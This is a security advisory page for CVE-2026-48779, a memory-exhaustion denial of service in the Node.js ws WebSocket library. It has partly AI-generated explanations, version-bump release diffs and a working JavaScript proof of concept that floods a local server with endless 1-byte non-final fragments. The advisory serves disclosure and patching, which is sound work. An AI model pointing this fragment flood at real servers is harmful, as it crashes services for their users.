VYPR
High severity · 7.5 · GHSA Advisory · Published Jun 15, 2026

ws: Memory exhaustion DoS from tiny fragments and data chunks

CVE-2026-48779

Description

The ws WebSocket library is vulnerable to OOM due to excessive memory allocation when processing many small fragments, enabling remote denial of service.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

The ws WebSocket library is vulnerable to a memory exhaustion issue that allows a remote attacker to cause a denial of service (OOM) by sending a high volume of exceptionally small WebSocket fragments. The flaw resides in the fragment handling logic, where each small fragment forces allocation of internal structural wrappers that consume significantly more memory than the payload bytes accounted for by the documented message-size limit. Versions before 5.2.5, 6.2.4, 7.5.11, and 8.21.0 are affected.

Exploitation

An attacker with the ability to establish a WebSocket connection can send a continuous stream of tiny fragments (each as small as 1 byte) with the fin flag set to false. The peer will allocate per-fragment metadata structures, eventually exhausting available memory. The proof-of-concept demonstrates a loop that sends single-byte fragments as fast as the network allows.

Impact

Successful exploitation results in the remote process running out of memory and terminating due to an OOM condition. The attacker achieves a denial of service without requiring authentication or any special privileges beyond a WebSocket connection.

Mitigation

The vulnerability is fixed in ws@8.21.0 and backported to ws@7.5.11, ws@6.2.4, and ws@5.2.5 [1][2][3][4]. As a workaround, users can reduce the maxPayload option to limit the worst-case memory consumption.

AI Insight generated on Jun 15, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.


Patches

bca91adf1567

[dist] 8.21.0

https://github.com/websockets/ws · Luigi Pinca · May 22, 2026 · via ghsa-ref
1 file changed · +1 −1
  • package.json (+1 −1, modified)
    @@ -1,6 +1,6 @@
     {
       "name": "ws",
    -  "version": "8.20.1",
    +  "version": "8.21.0",
       "description": "Simple to use, blazing fast and thoroughly tested websocket client and server for Node.js",
       "keywords": [
         "HyBi",
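Review bot: this hunk changes only the `version` field in package.json (8.20.1 to 8.21.0); the fragment-reassembly change that the advisory describes as the fix is not part of this diff, so the patch cannot be reviewed for the fix itself. The release commit should reference, or the bundle should include, the code commit that bounds the number of pending fragments, so that reviewers can confirm the behaviour change rather than the version bump alone.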
    
fd36cd864fcd

[dist] 7.5.11

https://github.com/websockets/ws · Luigi Pinca · May 22, 2026 · via ghsa-ref
1 file changed · +1 −1
  • package.json (+1 −1, modified)
    @@ -1,6 +1,6 @@
     {
       "name": "ws",
    -  "version": "7.5.10",
    +  "version": "7.5.11",
       "description": "Simple to use, blazing fast and thoroughly tested websocket client and server for Node.js",
       "keywords": [
         "HyBi",
    
86d3e8a5fb02

[dist] 6.2.4

https://github.com/websockets/ws · Luigi Pinca · May 22, 2026 · via ghsa-ref
1 file changed · +1 −1
  • package.json (+1 −1, modified)
    @@ -1,6 +1,6 @@
     {
       "name": "ws",
    -  "version": "6.2.3",
    +  "version": "6.2.4",
       "description": "Simple to use, blazing fast and thoroughly tested websocket client and server for Node.js",
       "keywords": [
         "HyBi",
    
b5372ac67bb9

[dist] 5.2.5

https://github.com/websockets/ws · Luigi Pinca · May 22, 2026 · via ghsa-ref
1 file changed · +1 −1
  • package.json (+1 −1, modified)
    @@ -1,6 +1,6 @@
     {
       "name": "ws",
    -  "version": "5.2.4",
    +  "version": "5.2.5",
       "description": "Simple to use, blazing fast and thoroughly tested websocket client and server for Node.js",
       "keywords": [
         "HyBi",
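Review bot: as with the 8.21.0, 7.5.11 and 6.2.4 release commits above, this hunk changes only the `version` field (5.2.4 to 5.2.5) in package.json; none of the four release commits shows the fragment-handling change, so the correctness of the backports on the older release lines cannot be verified from these diffs. Each release commit should link the actual fix commit for its line.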
    

Vulnerability mechanics

Root cause

"The reassembly logic allocates a per-fragment structural wrapper without limiting the total number of pending fragments, allowing an attacker to exhaust memory by sending many tiny non-final frames."

Attack vector

A remote attacker opens a WebSocket connection and repeatedly sends 1-byte frames with the FIN flag set to false (indicating a continuation frame will follow). The server allocates internal structural wrappers for each frame, and because each frame is tiny, the attacker can send a huge number of them with modest bandwidth [1][2]. The attacker does not need any authentication; only the ability to establish a single WebSocket connection is required. The cumulative memory consumption of the wrappers exceeds the application's process memory, causing an out-of-memory crash.

Affected code

The vulnerability affects the ws WebSocket library for Node.js across versions 8.20.1 and earlier, 7.5.10 and earlier, 6.2.3 and earlier, and 5.2.4 and earlier. The bundled patches only bump the version number in `package.json` and do not expose the code-level diff that introduces the fix. Based on the advisory text, the defect lies in the fragment-reassembly logic, where structural wrappers are allocated for each incoming fragment without accounting for the cumulative memory overhead of many tiny fragments.

What the fix does

The bundled patches only increment the version number in `package.json`, so the code-level fix is not visible in the provided diffs. According to the advisory, the fix was applied in commits on the `ws` repository and backported to older release lines [1][2]. The advisory recommends that users who cannot upgrade mitigate the issue by lowering the `maxPayload` option.

Preconditions

  • network: Attacker must be able to open a WebSocket connection to the target
  • auth: No authentication or prior trust is required
  • config: The target must be running a vulnerable version of the ws library

Reproduction

```js
import { WebSocket, WebSocketServer } from 'ws';

// Local server on an ephemeral port; the client below connects to it.
const wss = new WebSocketServer({ port: 0 }, function () {
  const data = Buffer.alloc(1);
  const options = { fin: false }; // non-final frame: each send is a pending fragment
  const { port } = wss.address();
  const ws = new WebSocket(`ws://localhost:${port}`);

  ws.on('open', function () {
    // Keep sending single-byte non-final fragments until the send fails.
    (function send() {
      ws.send(data, options, function (err) {
        if (err) return;
        send();
      });
    })();
  });

  ws.on('error', console.error);
  ws.on('close', function (code, reason) {
    console.log(`client close - code: ${code} reason: ${reason.toString()}`);
  });
});

wss.on('connection', function (ws) {
  ws.on('error', console.error);
  ws.on('close', function (code, reason) {
    console.log(`server close - code: ${code} reason: ${reason.toString()}`);
  });
});
```

Generated on Jun 15, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
